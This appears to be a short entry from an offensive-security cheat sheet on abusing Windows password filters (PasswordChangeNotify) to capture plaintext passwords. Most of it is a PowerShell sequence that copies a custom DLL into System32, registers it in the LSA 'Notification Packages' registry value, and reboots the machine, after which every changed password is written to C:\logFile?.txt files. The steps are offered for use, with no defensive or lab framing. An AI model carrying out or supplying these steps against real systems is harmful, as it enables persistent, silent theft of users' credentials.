Last updated 3 years ago
Abuse PasswordChangeNotify to load a custom DLL capturing plaintext credentials when a password change is performed (the passwords will appear in C:\logFile?.txt files):
PasswordChangeNotify
C:\logFile?.txt
PS > $passwordFilterName = (Copy-Item "Win32Project3.dll" -Destination "C:\Windows\System32" -PassThru).basename PS > $lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" PS > $notificationPackagesValues = $lsaKey.GetValue("Notification Packages") PS > $notificationPackagesValues += $passwordFilterName PS > Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues PS > Restart-Computer -Confirm
